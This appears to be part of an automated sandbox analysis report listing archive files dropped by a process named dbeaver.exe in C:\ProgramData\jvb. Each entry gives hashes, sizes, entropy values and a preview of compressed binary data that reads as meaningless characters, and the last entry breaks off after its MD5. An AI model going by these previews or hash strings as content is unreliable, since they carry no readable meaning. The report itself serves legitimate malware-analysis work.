      Preview:PK.........%.V................META-INF/MANIFEST.MF.SKo.0..#..".=Uy.@.A.(...DK.U..8.bH..vB.....v..=%cO..Lf....2....3.[N.........7f..f...i..p.......&.9.7.2..?..g,L...0..|5.)..,.W.YLW....xB.....$......L... ..&..f2..I....O....0?....I.U.:..@.r..B.....\\L|.V+C.W)0e..T........[Ce.......S....H.t..TpVR....x90...)'8.{..^.*...Q... ............*?V*.m[..ek.e-8W..`..w.J_._.}t#..x.H..;.Vq... ......iJ.8..a...jDM.N.5q..Q.p.!.....V.C.K`...zeN...<.h....8m....I(.tkeXR...n...U`..pbC...0.j.8.b.j..Q.DM..+(we./..O.;6j...8...t.>q..u.F.M.h|.... .l....L.`..+).:)['e.....i.3.D/.V.._C#..$...Om._..y.o.0~.....,.96g.t...z..(.%p.OW...G.BQ..p.Q...=..M..3l....n...p....E{.{.Y.=.....PK..d...|.......PK.........%.V................META-INF/ECLIPSE_.SFu.K..0...V..X......U.@T.V|..#...I..L.._..MW...{n.wO..93.j....I8....n6...B.9~hC;.34^...J"..x.H].h6v...q...Tf...Z....yPb?^..q?..`Q.....c+]..3.]........b. .....T+$GF...{5M.......{...q9..M.l....B...{..&7.+P...N.VV.J......c4.=..[......`O.0On."..l/
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):138111
      Entropy (8bit):7.881944850563909
      Encrypted:false
      SSDEEP:
      MD5:5CA0CC696A403F822C32EC4FBFF50174
      SHA1:D43657FF293593371C363D6AAAAC050E0EF885F7
      SHA-256:02BB38DE30B5E958ADBDCF514D7405C8C0CD2EAEC97D0F60CC3FC5CACB0F76DF
      SHA-512:51D756C9C70BEBE396CA174A81081930B76F11DA0AA3364FA8FCC52698927BFCE3AB772CEF7B687F339544F38B0E969285D7A09EAACD846A97D1419F8CAF7F91
      Malicious:false
      Reputation:unknown
      Preview:PK........Y%.V................META-INF/MANIFEST.MF.ZIs.L..*...z..>.A.".,. ...@h.+f1#&....<.I.c9..,.>...3<.D=..;/.v.{I......?Q....u?k..ze.wdf.....&ct...4+....^Mm.....b+...G.."..W+=....O.........+...$..!I.m3....>.q.%.g....B...8w..[..n..[.{.}.tWv..H"...{1...5.%...3..x2.........{.F~.4...$.]...v......gv.....V/.I=OS......^.m...0..'.>.^f.?...J.*N.DQ..3..T.........A......_.....?n...x@.MG...?B.l......$......0.^..F-...zWd...zT...Y.Zc...8..n(.W...C..O\.&Yq/.f.....L2{..E..u.-..$....=I.O=|.H..yJV...c?1.....Y....8O..d..~.....~EqI.z..P80..\....s.K..?...".:4...3.q....{s}..2...<...y....:K....4..(.P.sY/N_........g..V.?............8..t.....6.$}...5.N...$..@...2...I....%...u.[,..t5.......W...;I..T.i7...^.......&:I..#).7..+j.$.GB...u.xC....!.g.z..k..^.}...e.....IM.....d........._{u~..........,I....t.{}..d..x.....5..{...........>.x.]q.....0l 0...0.....:..8..3.0x.#}u.!.;o}..\.........=..N..B/....wZ.\..~./.....v..?...O...1{.Q.... .a...=.#$_...7.H.p..(....T....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):19591
      Entropy (8bit):7.862657974473488
      Encrypted:false
      SSDEEP:
      MD5:46865337C959CCCCDDB27BF27AB0D6AE
      SHA1:161A70DCC6D5D51409651F72A808514E5D743A3B
      SHA-256:5833ADF4528B87367FB5A622499334F75E5C44B40C4C14C60ED555DC71BB52E1
      SHA-512:D1410CB568E4AEB9DB7586A48FF037A56E7125948E9B113D342229D4F2CF65C72EE0C9F85EC32ECBD1B6DCEB40EE76A51940DCB493F47FA81138217577521016
      Malicious:false
      Reputation:unknown
      Preview:PK.........%.V................META-INF/MANIFEST.MF.T.s.<.}w.....>..+.U;>X.U......0....._..u...N.)$.9..s.e.3.a..%f.....Q.9.C.C.v.Q....chEJ..K.5P...$..q.Q..#..<.ea........W3...-O..dZ&w.+...4!.-..X.(!9.r.4.z.W..BA.:.aq..0...N...Z..`..q..m ....S..uH......0..;..!..$.f..e.K.y]...2.z.m`.?j..D..a.....?..P..r...A......(.d...&G.7;........L.B....$.L.a.>-....a.3.yG.(..DtVB..]...!,>...B.$t......z.du*.6z.J.....&.b...J..._. ..D..............6..+jah...l@..Zf...&K.3.}<.V.".-....U9...4.&!.{u4.K......;....D.y...z.^;7.~".j...R..:....BN.,).P.9...aO.vS...[Q0.4.g..?D^k...N........d.N...o...d..-...i.'.l......l.>.f.h.:..j:.OL...M.h...kt....L.. ..pw.....LS9.....Z.h.|1[.7....:......F....N.e...;+H2_........K...h...{}k..U9.z&..F....@......?..Xc.S..b...l...-...}..>.Nc.t..o.r....E\P./.8.vM...p........D.?l..`.d......zh...!...*..y7.....}E.q.....|.fwS.,.f...C.N.f.....\.L..].v.<.!N..z_..9*......".x1_.....{q.....V.g.....PK....,.........PK.........%.V................META-
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):136377
      Entropy (8bit):7.843008201502089
      Encrypted:false
      SSDEEP:
      MD5:9B54C3E4E18EF5B23AB686550418F8A3
      SHA1:761EC57BFB73AAFDBF4F8679E7B9F71DB34BF26E
      SHA-256:7D5505FDE8E06A366DA524B244B66351569DBF15407BED611835C09C215E3244
      SHA-512:B4054BEB1DFBE0DC254B3A324E9F002494561CB3015C7E659715DF2AC05EB903E53148FB45AD2AA8240D444BBE5BB9AA62E4F62ADD852D4E8B529143E0A5B43C
      Malicious:false
      Reputation:unknown
      Preview:PK........7%.V................META-INF/MANIFEST.MF.{.s.L...[....z.b..l..$..B...G!@b.8..I.._..vl'....8....{..~.g"XY.{U}.{e...;.....UzV.....`.^vG.N..^y.<`....M....{.W..._...en..V.}.._E..Q....^..Cj.I.<.....s....._.{.eA...*~.e3.E6u.Zu.....L..{/...<@...-......{....a.SG.U...3=DY..<8y.=..Z~T....S........|.XIt..|]G..6.$...Z[e...I......*............E;....;7Q.t.9.U$..Q.g..."8..T..Z.r."/.{.rNV......>.....m.~..;...s7~.......n.....~3.z.y....?..vj....s...8...R]-...q._F...k.c..u..u....(y;x....L..'.s......-......~.#j....../<.-......U..mY.......FGx.y.=...z........q..-..)&~.....y.D.~i.3.^..._&A^'y.=.....!...?........r....=......?.qt..V....i:n...y.S=.....F._.X..QU.....^zU.\#y.i.U^\mf%.n.;Z~...m4.F............8.|........#?..=e....wON..V.ye=...+pW..q..G.......Q.Uy_..W.{D.gd.1F..V..b...e...vj....|o..g.qW9. ...u]|........e...(...?..1....EO..<Y..~O..U.?..:n.._._.:.Y....-..Q..1.....l..q..@g.....9.....Y5............{6...|.(;..z......Ao4O..J..H...~..%...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):387431
      Entropy (8bit):7.900758005536314
      Encrypted:false
      SSDEEP:
      MD5:617F512DD713182092E267155B008AD9
      SHA1:8556CCEF1A58237DAAEC20F2F48DFA2140E5DF33
      SHA-256:E20DFBB20741DC4F289C20F0C4A3B1CD4178E83A2796918874E78DC16A9010CA
      SHA-512:6E6F2C613DAADAEFDDF0009F110B357376EDDF7828B2EDF8E529D14F482DDF201447CCB9D6D91CE9CD39AD7E30E37008D43CEDF1C6CD894A0EC1D9FC3C4852BF
      Malicious:false
      Reputation:unknown
      Preview:PK.........5gW................META-INF/MANIFEST.MF.}Ws.X...D....7p.`..=1. H.0.....{C..~).l.(A5...-R.....Ks..S&a....A.%U..o.g.............o.3..oT.......................:...#.^+.<.].r.o.D..It.....W..QR>.../.\.U.x/...s..I...."..UEQ...2..~........W......#.!(D.....~'.....>....^..>...j....~~..i...u..A.;.}.O.O..o..\..rJ..z..n.1...;=W..'..........a....]v...s`|......N..?.~../d;/;..G.....).o._..U...+...'>'w..&l.o._.....7%h...~....L.6...e...?....[.....W....+......AW.............I..N..l..6........_6...s..w.V.....?...}).e..F..w...g.I..:...]f.R.g.._..{rg./M.}U._.~.*...R....jj5.^..a....t...y..Q....}........>}..r......\.I.^.....w-..?^...__...|zLz...O.p....;.+........O...E!....G.0t..*....I...g...?.$.........}y._.3:....+.....'N..o.x.....[z..|.+P..'eV.K>...~..*..v....*./.;.;.L...Y...T.......n...-..K.Lx.B...v.Ep..\s........*..u........Uw..O_6...:h.......U#.....m..3X.R{.k......[C..]I.Ap.G...0...F.v#L.b......e.....2.M$..V.f.N..M/..u.X..O..o.G4.P..(...E...L1K
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):93705
      Entropy (8bit):7.916360670778169
      Encrypted:false
      SSDEEP:
      MD5:275BF123CEB4320C5398B56450840EA8
      SHA1:F422E7F1A1E736BC421FDCAEB300411FBD7CCE30
      SHA-256:5EE06C2309B09A75DD837E5D41DE78CD736B730841ADC5826D41AE3E5158B820
      SHA-512:EBC3D198ADE76AB1B8EFF770AB9869B79EFF8715DB23F4330D599516EF1D32634F8A8915DD6B569AA30BB05713E74C1E5C47B19930F07883F20A19A05123C41E
      Malicious:false
      Reputation:unknown
      Preview:PK.........5gW................META-INF/MANIFEST.MF.X.r...}w.....1..h.....B.b...$..v...._a...m.v....%.9Y'..<.C..Y...i........7tj.muG...\/...J.=(.....=..fT...N,...m.}.8].-.../1.C...z`?.........;.&0"...'..........~.R.g....f t};o#?.i.......zp.Da..Q.."..~~...,..|.p.{.H.9(.<J....O..../B..v`......(.....R.u..G.F%.....Yd.>8..x..r{..q..]I7=..Y6........_.n9.!....{.W.6R.~|..F....v...5..i.. ...g.....zd.......... .../.2...O..ZwA...S..m5o.=c.D....0....8%..|.7..m..D....C...='mW..R.E.?H...7z.x{#..K.~.|e.\;..SY.7>.}-R.x......Z.UU=....W!..1.......?3h.....F.:.,....N..X'2O../.V.t*.V..........nv.8.s......Nw...i.c.vh...]f.....N..Vw.}_..Y....{.}..jyFh....u.x....z.C..(.@.X...#N..#0........X.I.1...8.X..8..._........~n..........^.+..?.5Hk..N...9.i.......G.....(..^..ZKl.9..^...:...p...p......eDt\.3 F.V.iM..%..A.........'w.Q.\...]PO..b.....<...}AzO......M.....p.q9)..lh.C.'y.s.3&...5._.q...5.[sS.L.w....x5.I..)....\@).f<]T..-...zu...19..q3.b.w<j0..p...P$.;.. d.x...S..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):244252
      Entropy (8bit):7.936877521947931
      Encrypted:false
      SSDEEP:
      MD5:9185F3F362015531FC00AF27EC0BEF22
      SHA1:A569FE2C076456B2A884E75824DD0A624CFE342B
      SHA-256:673A9356B19561589ED6A4FA8D81D97CF708877F1F9A0658C3E693CE8E10BA6D
      SHA-512:FBECAF06D5CB5CE5EBC8547B566A07D0B83C95B2B2F9E8FB4243BEF51357089CB02DA3A8A140A02A6049F15D3C7DD5AF10EE2F6C94F15E1D8D9B6B1CD4B2023B
      Malicious:false
      Reputation:unknown
      Preview:PK.........5gW................META-INF/MANIFEST.MF.[I..Z..;...q...;h.3H...H..y...+f......G...}.*...)..d.....N..A.~1..I...'....aU.N.._...'....U{q...'.x.?~..$.p~.E..o~.|.W.Y.E|Y......<...oU.EI......c.Y.=?Q..C.eI...A...e.<.y..&).,h.u..u.s....P..z...Aa.B..0N.xl.9M.8m.......&......,q.<..y.WY..E.3.....?|z^..;........?...PzN.LO....,.....*....x...)..y...x........_8Of~.y..6yy~^..+.?h..K....6~.....+.$..t.........OlV..?......'.|+..N...%)...g.|.. ....Lc^.5..S|.....&q.,i........_.|rzg.w.=.........W9u3...D.D.CX.O].:.i.....G..3./........J.3..~........8.y.........;f.4~.@um..../b.w?<.Ng.z..E/.... ........FI.5n.....u..>s.e./.Z.....}...?.....l..x..?....v...I..Q..Wr}.......O....B.I ..:a.....S9/..... .3L.6..~.......{.Yo:.......c....%....>~....'...h.W_?.%..d.lpDfk...^..y.\=.N.-TF.h....\q..w9..rz.28o.|.;....N<K.....e.q.9R..Q..{.G....!p..-..(7idq.|..X.Q.r.........+._l.G....p.C.\..e.Xw..a.*.@.........1..s.va0.?.Cs.S....X.A.<.6..8.h.\V.Ir...Y...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):1352942
      Entropy (8bit):7.927757533762425
      Encrypted:false
      SSDEEP:
      MD5:70B4AD99D328160D6998FB4C91156830
      SHA1:D141955C1CF7BDBD35BC7B77C7BE15E758A8D660
      SHA-256:6FA3788C2804B285942EF16AA546EF3C9CE304B45EA970717B977056FF5AEA28
      SHA-512:B81F33B08346A1C0C703CB83E7DA2C1457C146352B0EAB6A4AEC3E629074E4F5B7AA50585167D1013C82C75CBBF34B170EF2931F89F895CBF224BB7654109C32
      Malicious:false
      Reputation:unknown
      Preview:PK.........5gW................META-INF/MANIFEST.MF...H.&|_f..ee...c:.HLBUV....@L...1f..x.F..cO.!...........5~k.h.q.7.o._7q...o.....Y.v.{.....M.{?..^.Q.......W........%.........^..&.=.....O{;....U.]...?..Q/.S...zEQ...n.............y.......u...o...!./...%.-1p..r.....4..F....._.n..v[.7............/lV.~....._.....S..)...._e]....?..P.v.O..g._..._.,..7.v.;.9.......o..........'...5..z~..j.)..}......o..a]..x...;..Y.{>OuS..i....}.".z...o....7.........GD.O.q_..un?O.u..............{e..9..[...3...+..?..@.o~_.7<........HW&I........t.-..N.....}....n.eE.2..........Ao..q.;q.....k~....._..2.&.o>"......._.....i...x7.L..~}...S....vu...Gm[...f".ax.m~.0....%..........}..W.....I.?........=.....W.^....?.8?.'*.$...u.(.........._...-8?`...7....._.J...._...M....1t.I....,..........+.N.w.g$v..}Y..I.^.....b_.......v.A.'..M.......i_x7.....?].:.s..r.X.Ps...y.4...yc.+M._.yZ..-.h._.'..m'S~..7..w}.W....F._.2[.?h.....n}).....f......7...}....aG|wei..L....M.....UCQ'.d..Y.>....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):94153
      Entropy (8bit):7.931595684815396
      Encrypted:false
      SSDEEP:
      MD5:ABE8950A8060D892438607D0938580A5
      SHA1:8767A9073685844F0584D06592FA13B9BB9E89D9
      SHA-256:CB30BCF102C48662A8ADB91C825F7D3E69FF430E1CCC708AB8A14C142C5041DA
      SHA-512:24E47E07105DABAB1211E0712F1F523432A80D7955061157E4AC651177F9AAA3399F97EC3252397F1F0F26DE3F819CB535115B739AFF159DA27AD4EA417CA315
      Malicious:false
      Reputation:unknown
      Preview:PK.........DcW................META-INF/MANIFEST.MF.XYo.L.}.........^.!Q..n..1.=.#/ec.Fy..O9d.t..H.X|..{.Q.\..Ic.`..}.h.7=...X.ny_....5..;7..F5.&q{.M].jL.Cc....c.......Y.J.........K.7.>.>Y...z.y.......F1h.c..a........i}L`.v...L...fF.$E.8...8.N..BX......`.g&n.'..W..A.`.{.).W...Bh.{.'C.>....(.IC...|.Zv...h.w??K...>Z.P4l."......f.A..A...).......&h.HS..P?......./....(by...'.C.<@.^.'...z....^......@KOt/<....o. 0.o. sa.. H.j..H....p.E....|!......(.5..~.Aa..B....(S.r.4.aQ4..@_.|7x.}..O..Y..Y9....o.w_......3.HS.|ge.T3.H..l(U=B.8W........,..sk.......O..D(.........Qi~q.|>.N".Bb..F..t.5.{_Kvn\C.a...4.V-.k..y.C.V3..B4R.m$.jQ..Oq.....c.\..k.....H.(.q...........0.R4x+...D...A.,pi..H...C+}........ec............Zl......$..1...F.g.YS.Y..^.>.."..HOv.w.L....Dw...7.IT.fU...&..H.vK..,c..."J.X....S......n.&}{s{sv.L....no.c.A..F.u.`...F[.2.3..Z.4n...H..M:."..5..C....o.../.b/.0*.....0(..T..B..V.....g;rM.Bw...d.h:..f..B.I9....H9......5vpQ$W..'U.~..K.....n...-V....~.&0.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):54205
      Entropy (8bit):7.878742416493356
      Encrypted:false
      SSDEEP:
      MD5:54F4779B209CC227102890606D30ACC2
      SHA1:A88CC1CF0AE3E471C3520A55CA06DAA70DBB2CA9
      SHA-256:34CD536F7F3515C1288ED817D3262E078397582B56643F172D5F94175615539A
      SHA-512:D3D20618F48DD5BE3EA313503B4E55DF4A80B89CFD0402C2811761261E9A0081CC58FBF6697B4C4766BD9A49CCD35AF64C16AF8659BDC45475D62E727618500C
      Malicious:false
      Reputation:unknown
      Preview:PK.........YfW................META-INF/MANIFEST.MF.X[s...}OU.C*U..\.......A.o/..h..fs._..8.$3!...=%.{.^...[........(...j..7}.A..f..p....w...^..]....^..vsb..z.-....m.6.............?...^X}x]Y..P....!z....3.=...!..-........ez...x.........-...:..I.r....E.M.c.W;9...]@.l|e.....B.....*.A.{(.....w...}..W{.J...J..c%}p9....8BiS.......u.-`. .no.]odeI....^.B....lb$.y8....}.C.C......*...I.....e......y..c..(....J._..t_%....o...A.KRt....n.7RP/}..^.A8....[~.>.....-6.;.x$.......y.H.s|....?[a._...y..3.0Z).g..[U..v.O.>....c2.t."+.p./a.^]12....2.P..VS....@q._.m.Q.,...D0.`.p.X.....4.......3..:........+.*Tl...t.t..pB..}.....^.Y.,I.?V)...K%.....;m....1!pl.4..n.e:.E..c]oo^...xaWmF\K.x.....1.h.....Z..M.a....Zz...h..N..V...M..f.....t...tfe.%..|..4.{.**I...B.lc7>.m..a..."..!...`......B.%...-..FU..dp(>...../z..a.@........E...k)..s..[Q...U....:7.i...V..1.n...b...e/......p.r.k.../.z3..n+#..tw1'/J....IN.69..~..z.g....!}.w...d.ZW..CB..N."..@..W..n...2...f.v`?..i.../).g
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):154417
      Entropy (8bit):7.921580053939845
      Encrypted:false
      SSDEEP:
      MD5:01DE566979E0E49B693D8CF563F73FB7
      SHA1:8B0862AC581D17B0EBEA3DF77DD653D45A9AA584
      SHA-256:5BCF739C4D446E17F775CA5122FC445F3F29C274D4E96CB90AAB33D3CDEC3844
      SHA-512:CD9611890F0A42D81B23E53DFD6524984743A9AF062706E6E4D4B450749FCF28F0EE69FC6770AA2E0139C9A4C52F52E0D52331583E426C470FFABC9192FA52B3
      Malicious:false
      Reputation:unknown
      Preview:PK..........fW................META-INF/MANIFEST.MF.ZY..\..OU.C*.sq..P.M*.(.2...r.N1l.y._.a......=....Zk..Yk..g..|8........~.n..........k.. r..j...=b...w............k..^l......Br..h.G...J.....'R..I.O+..y.f..x.Y..I.h&Q.._>.^....-.....v.Gd.8...z.Og..c..b..,..S..^/..~...;.M..|8.f.;..`&9x.....>.IR~i.....U|.....}...A.T....^?M-.h\5..q.y..^........HC.....I.}..]..R\...@1....(..>..%?1._...v.... ......E9p...?.~...Rt....!.o.....^...(A4"h..z....?(....Rd..)_?...G.........wR%h.z......'.@}.)......V....J.k$.I.Y .).....@...yg./........../'..}1..H.?...k..3....?.|&eQ-0.k.Pq..I........D= ."....(..F...>..L....'V.....{......._....>;^..-...A.o.2./B.....A.u0.7../..._?>m.....R....W......7........0.7...E(..3..p..........{..e...6..M.I..'.7......x.N...S.{ =gH..?.wxW1+Q.fL.fY.h...8._..".,.3.......w.<q..T<.U........:&.N./.F.*.F..b..m..P.s..upV.T....v..pHA..O..`...a&H.7..p9).)v.0...O...8.z.qK.....i-.P3.[.|...I^<k.....O.+.^n.V..).p.b...y..Z.d.U...Mo..yM.D.U.....j.\
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):28820
      Entropy (8bit):7.78347945760387
      Encrypted:false
      SSDEEP:
      MD5:8F6D47CD7542661C116BF30B4FCE91D5
      SHA1:70EB14A6CCF3E586E3BAE81B16AC8C5629BE6871
      SHA-256:0A7B890B90EF693AA7BA5B6BCE786B8ADD4AFB68BA0DB9F96D8E0F80F106A1C9
      SHA-512:2BB82EB9673A8518A4DD28444B5ACF6F395F315C34934696CAB1B4FEEE16FF5AB109A6A04A61D52F409068370BC2466FDDE6F8B63C5AF159579AFDA30D9A3C0C
      Malicious:false
      Reputation:unknown
      Preview:PK........R.cW................META-INF/MANIFEST.MF..Y..J...;....q.+.(....q.Eqy....R6.@.O?....sn/.3O.U.....e.3+B.$i...8j.8.}|.bh..w.vmf.aTS0....@K4....P....n$.T..w........$...[!l.........m.(B;..x..c.. @..4<e(.s....0.Qz[....y...<.....u.%...EN.o.u.....m|y.....!...b?:#.Ga.].[g...9.....I..n......b.i.E)...+..@.4....aX=.$@.q...1....*.K....p.P-..j.eJ...).|.cV@....V..*T`..mx..+@..v.5..~.9._.L.Y.a...R....qX...Y.d..~W...X.3.....z. i.....J.~.&..0..?...!.f..f..~...f.H...~._.&...O?R.{~Ro".t\k.o.A..<s..@Gt..8...l.-.....xQ.e...f.Q......OF.'./..k..u.H.#............c....T.!..2./.%EdJ^oJ.t.g.-.JJ{P..Uc3l....k........,..4.>.(..x.V\.1.r.t.h..I....W}..R.?...k,.~.0$d.G(..g.1....fo..\)3.....wb4.I...K.yB.Q..1P..PK ~Q..9..69..F..3l..V...S..kV.v.....k}..o@..^P*.}@c..p..f-y..@.....a.k..f2.....Q..4.%...!.PN{q.8.IN..4;fhZ.....A4Yw...(zQ...To.....m.2.....;]...e...............k.W.C^O..u.+...>....!w....WJ..,O.F.|....#w#(6.6...vq...8*n.l.C1R.Y.L.8+/v#^RCN...*...e.;r..U.ro
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):134089
      Entropy (8bit):7.9204359291696536
      Encrypted:false
      SSDEEP:
      MD5:E124D99A1C70A9E6BD3B055AAFEA0F6E
      SHA1:BA1AAF196AB11181C9309256790B46D72CA74B8D
      SHA-256:D9AAA80AD5B674CED6E5C22BBB079707E575AC8FB1FDB82FC109C1C50E982F48
      SHA-512:EE035048F0EE95A23D67C98C1C28D74DB80D2993833834C306721F581EE1542A080E9DBF18E38629F62E4BE321E0E4878157FAAF32DBC11726B22D3AB1D536D6
      Malicious:false
      Reputation:unknown
      Preview:PK.........[fW................META-INF/MANIFEST.MF.ZYs.L..OU..+....x.V$./...M..Z.bJ..V.......;Nb...J.v..g.nfV..^..7^YEy.p..._.....3.....x..]:a.x...'.../L.%......s.e./s..~v..B.}..[..p._.S..x.Q...'.s...A.s........,o.N.Uy.s.+.x...~..(. 0q.S...<..Qc..|.l.MS+s..k..+./.^1......s.et.;V..-...H. .^..'n..Z.O3FY..y.z.x..[....>.....y......".......^....+..y...9.....t........O......U......>/.....Z.OSJ...t.O(..w.....gP..m.9..(.(y.....].0...C..6;J?...0.~T...k.%}.........x.5Y..h..Q..&.M..Q.9...........x...q..S...yq.Z.....-.2..4.~..(y..lKoN.F..Qu..eB.$...ND?.;`I...m.s.Q....iy..S:6......C.H.....~.x.=.9..%.8..KA..?.(.<<~...O...:.Q......q?y..8>J.$..).U.%....~.k..]...n..1.......dqK..J/s...r. ..!.E..A..O2..../..{r...n.....s...w........3.v......I....G|hS..c6>.....,.....P....;.r..N.~y..3@.....tV0.l..f.....Z..of.E.!...$V..*.....K.w...Q.|..3l..\...3.#eT.w.l.7r.......G.E....{.$W.........S"..0..w4;R!=cI....p./.`9.8..C|t..{......>.h..K....&r.$C.0....@.. ..H.,..e.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):35999
      Entropy (8bit):7.8514805671242485
      Encrypted:false
      SSDEEP:
      MD5:A59B9803401723A5E8EEDE0A86A3B76A
      SHA1:63FCE1C57D430DB3094CF0002D1642932E60D118
      SHA-256:093590C14C8130C5A0E16916DE30744CEAE8D49B0B351985CB1BC9700A3E5487
      SHA-512:0FABEB8063525F6C7164299D28F94B3019058D1301F5EC396599DD166662E99B14576B6AF064548E045A55DF8FC284EC1B755C9E7DE434DC4BD6C5D804EB611F
      Malicious:false
      Reputation:unknown
      Preview:PK..........LW................META-INF/MANIFEST.MF.Wis.:......&53uo.....2...9,f>L.l..e._?2.Br.}/..".u.t.....0!......j.g...:..@.P.Ws:..0.`{.6..DFf...Z.|..vV.#.6.V..B....y...G=..j._.q.-.'W.eF.8f#p..s.P.........|d..".1..Q.@..S.F;.R...N.......+.}0...1......N7..?nN$..x.......]... .S....&.."....7.'.o........~^......fH...;..-.`.-|..D......d........gV...F....~L.....1e...U.C'.......nd....9J!.S....Q..CG.A;.,.p.p...o5...`...).........Ax<..M...............m.n.....}p....p.A.E.1....=...c....&u.$I......`.z.>=\.&...U......4.I....).p....Y..*;GY>.>...}.<].+..\...u.7...\..5j.#.`....iy)....xw.t\..L=....?.h.....@.?.R.JJ...`...I/..7...F.b....1.m.p.....HuAH.TY...H...{.*..X...3..V.1 ....0....G.....m@.9.."Q.."..T.%.,..b.,JB.,....K.....*R.q..V......J.}...B..-{T.E..I.j....I.<#...j...L[.}k.y...y3#U..4I...Yu.+1.k+^]....+J.. YK|D\..C{.<..[{..x.^.Kh.bNb..zM$h...Y......Z K7...........'..Z2.6.o..;g./...;:l.+...U..q8.+.4..}.br..z..a.:2b..A.[...qKh...A..x...p_c........wA..e..zS_....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):73503
      Entropy (8bit):7.955248745731498
      Encrypted:false
      SSDEEP:
      MD5:69347345AA8BB3F6A2B9E927767FD740
      SHA1:22D12F57DE51226EDB07CB883D8B62879564F064
      SHA-256:92BDE48E9A98906DA99F6F29412DE5D4E37B8AA13FE6AB95CB04B0FAF0E3FF16
      SHA-512:856F471AE7E91BF4A1A00C9A7CE8A543C84E4EE7FF098025938A39BC13CEF36D0FC2D0EAE010EA39E4513C19C36F94F20D9CA7D6436E26395A1CDB6B3676665C
      Malicious:false
      Reputation:unknown
      Preview:PK........UZfW................META-INF/MANIFEST.MF.WYs.:.}OU.....0..^.l.<.-.I...l.[A..$...l.Bw....O8..s..H.... ..7H."~5.....:..C;[.W3..A?.S.E...|..S..j!.v.k..F.-.....m...O...zZ...V3..8t...qZ1..I0...B...0....M.|...X.........'.|.CN..2~......LS>'."UV."....U.|...%..!..W.X.....PJ.........Xk....(%...oUp.....Lg...........,;....;...DJ.9.l......N.'J..8~..U....G.?l%.A9.i.,....Xd,..S$....X......0..3.x.~.........x..e...K..D.9...Hq....dw.....t......r.#....O.6..c.\G=..8O'.......y!........}.;.C......h....%.@.....s..^..H..~1.!/...sg..5a....H.-..M.@.".HN.r..S.M..r*-.ybX..nN...rR.O.....;h%..<...f. .F3.....B.N.G....x.d;....v.>...GQ2......cp....!'.xoe...O....,:)...$....... .f..U......J.xvC3.....D.DjE.E.S.....&.I.O......#._ .'.\....G.c?[.BI6..+_..b..)...V.j..f.PV@.....K..L....L.m=.j.l.9..fJ.i<...a..M..[z-T.-....\.c.k3.[.._.B.Q.t..lP.Ge..>qr...}'1_...-T.6..6.....l...#.6...."...7.. c.)X|b...r./0jXu."..I{P..N*..n.]m.^......z.A.p#.f.['.p...`...\`..G..G,..q.P.F{.Ylva.[...!
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):39998
      Entropy (8bit):7.8795263864881955
      Encrypted:false
      SSDEEP:
      MD5:2F68BAD557AB4919F7D7F08CE48A0030
      SHA1:DAEEF6F5833A3926A08AB61F17BDB1E902BD6296
      SHA-256:172B24A145C5CFC10C88475873601CA2599DC1A726CB03213D143DCBEA1F828F
      SHA-512:BECF8201918E5DEDDF2D2FC533BF146FFF3BD13BF9CE65CC0D4D10715CF5397B3E1EF64E1D5CB505582B680C266D1CB9443F358008C2E56A9C980C795092E10E
      Malicious:false
      Reputation:unknown
      Preview:PK..........3W................META-INF/MANIFEST.MF..Ks.8....w.R.'.l..L*.c....l.l..B.............R._..[....(..)"...J*.......Ez....z BnJ&...".B..[TCl...>.lY).su.ez'.d.<..........n.r.Qw.....-<bf.....,....Y...w....`.9..i#.._(./B.]..,...|..K9)......{$F!^.uD>.t=.l... t.}|h;.Ghf....7.^`.l.H.!...@..,...'..8x....,.).......0{v.......C}.L....L>F:.0..U.....Y~...S.A0.ePyy..)S.......~>.......S.........fH..H.a9.v..(.G..1..$..}H.8P...!S....q.q.<..Z...b.t....O.B...]L...z!.|.E.. A...w..........C.u.........0.i...[........u.K+....Z..=.d.9.._z.s.........Y.P..-eHqth9....k....A...q..yzxn...........12.A.DA%.@.bbZ.(....g+.bR.$.9.r,Pq.b...j.<........)0_...\fJ<...G....#.J..EQ/..B....xI*.Z....K.*.....p..h^H..u....%g.b1S.&.o*.....=...*r`.uJ.A.:.C.+T..VG..._........?..wUK.g.8.5@...B...W$..|=..B.3B..].....J....B...M!j....R..UfH.H.@V1.$....ZA'c*..Iy'..q..N.~i?o.r2.e.h)......jq.(H.r..5^..9..N.s..y...W0.s.J.4...m....T.......`?.....z>..U[...f.j.oMf`.^)R.l....g..U
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9554
      Entropy (8bit):7.5696586667933445
      Encrypted:false
      SSDEEP:
      MD5:FBE41BB6DE301F6E0D0F841EABF34C3E
